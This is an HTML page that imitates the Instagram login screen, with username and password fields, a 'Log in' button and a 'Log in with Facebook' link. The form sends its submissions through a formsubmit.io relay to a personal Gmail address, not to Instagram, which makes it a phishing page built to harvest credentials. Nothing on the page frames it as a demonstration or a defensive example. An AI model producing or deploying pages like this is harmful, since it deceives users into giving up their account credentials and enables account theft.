<!DOCTYPE html>
<html>
<head>
 <title>Sample</title>
 <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
</head>
 <body>
 <div class="container">
     <section>
         <option></option>
     </section>
     <i class="fa fa-instagram fa-5x"></i>
      <form id="contactform" action="https://formsubmit.io/send/ngwakachisom428@gmail.com" method="POST">
  <h1><b>instagram</b></h1>
  
<input type="name" placeholder="Phone number, email or username" required="">
<br>
<br>
<input type="password" placeholder="Password" required="">
<br>
<br>
 <button class="btn"><b>Log in</b></button>
</form>
     <p class="p2">forget your login details?<a href="Facebook.html">Get help logining in.</a></p>
   
   
<div class="con">
 <div class="item-hr"><hr></div>
<h5 class="item-OR">OR</h5>
<div class="item-hr"><hr></div>
 </div>
   
   <h4><a class="Facebook" href="https://www.facebook.com/profile.php?id=100084928186945">Log in with Facebook</a></h4>
     
 </div>




</body>
<style>.container{
    text-align:center;
    margin-top:25%;
}
h1{
    font-size:45px;
    font-family:cursive;
}
input{
    padding:2%;
    width:80%;
    font-size:18px;
    outline:none;
    border-radius:5px;
    border-top:rgba(250,250,250,1.0);
    border-right:rgba(250,250,250,1.0);
    border-bottom:rgba(250,250,250,1.0);
    border-left:rgba(250,250,250,1.0);
    background:rgba(250,250,250,1.0);
}
.btn{
    padding:2.3%;
    width:85%;
    font-size:19px;
    color:#f1f1f1;
    border-radius:5px;
    border-top:rgba(30,136,229,1.0) ;
    border-right:rgba(30,136,229,1.0);
    border-bottom:rgba(30,136,229,1.0);
    border-left:rgba(30,136,229,1.0);
    background:rgba(30,136,229,1.0);
}
.p2{
    font-size:14px;
}
a{
    text-decoration:none;
    color:black;
    font-weight:bold;
}
.con{
    display:flex;
    flex-direction:row;
    justify-content:space-between;
}
.item-hr{
    width:46%;
}
.h5{
    margin-bottom:10%;
}
.Facebook{
    color:rgba(30,136,229,1.0);
}</style></html>